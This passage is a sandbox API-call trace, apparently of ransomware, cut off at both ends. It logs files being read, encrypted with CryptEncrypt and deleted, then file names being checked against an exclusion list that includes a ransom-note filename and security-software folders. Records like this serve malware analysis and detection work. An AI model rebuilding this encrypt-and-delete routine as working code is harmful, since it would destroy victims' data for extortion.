hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.614] GetLastError () returned 0x0 [0153.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.615] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.615] GetLastError () returned 0x0 [0153.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.615] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.615] GetLastError () returned 0x0 [0153.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.615] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.615] GetLastError () returned 0x0 [0153.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.615] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.615] GetLastError () returned 0x0 [0153.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.615] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.615] GetLastError () returned 0x0 [0153.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.615] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.615] GetLastError () returned 0x0 [0153.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.616] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.616] GetLastError () returned 0x0 [0153.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.616] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.616] GetLastError () returned 0x0 [0153.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.616] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.616] GetLastError () returned 0x0 [0153.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.616] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.616] GetLastError () returned 0x0 [0153.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.616] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0153.616] GetLastError () returned 0x0 [0153.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0153.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0153.616] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0153.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui")) returned 0x20 [0153.617] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", dwFileAttributes=0x20) returned 0 [0153.617] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 1 [0153.617] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui")) returned 0 [0153.617] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" [0153.617] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0153.617] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB28.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb28.tmp")) returned 0xcb28 [0153.618] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB28.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb28.tmp"), dwFlags=0x1) returned 0 [0153.618] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXCB28.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxcb28.tmp")) returned 1 [0153.618] CryptDestroyKey (hKey=0x9ad178) returned 1 [0153.618] wcslen (_String="OK") returned 0x2 [0153.618] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.618] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.618] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0153.618] CryptDestroyHash (hHash=0x9ad138) returned 1 [0153.618] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0153.618] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0153.618] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0153.618] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0153.618] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0153.619] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0153.619] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui", pszSpec="*") returned 1 [0153.619] strlen (_Str="NMoreira") returned 0x8 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom 